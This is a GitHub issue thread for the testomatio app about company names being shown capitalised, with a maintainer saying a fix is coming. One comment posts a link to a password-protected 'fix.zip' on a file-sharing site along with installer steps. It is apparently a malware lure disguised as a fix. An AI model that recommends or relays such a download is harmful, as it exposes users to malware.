### ISSUE TITLE
company name is first letter upper case always

### ISSUE THREAD

**Issue by VeitPoigner** [testomatio/app#1110]
**Describe the bug**
The company case is not shown in the way its entered

**To Reproduce**
set the company name to all lower case

**Expected behavior**
the company name is written as typed

**Screenshots**
![image](https://github.com/user-attachments/assets/b06d1b4f-0ef0-4a9d-b3eb-54312e4ad7b4)

**Desktop (please complete the following information):**
 - OS: linux
 - Browser chrome
 - Application:

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TetianaKhomenko** [comment]
Hi @VeitPoigner! The fix will be published in the upcoming release.

![Image](https://github.com/user-attachments/assets/11fd8c1d-a0fa-45e0-88b4-76ad2baee9f9)
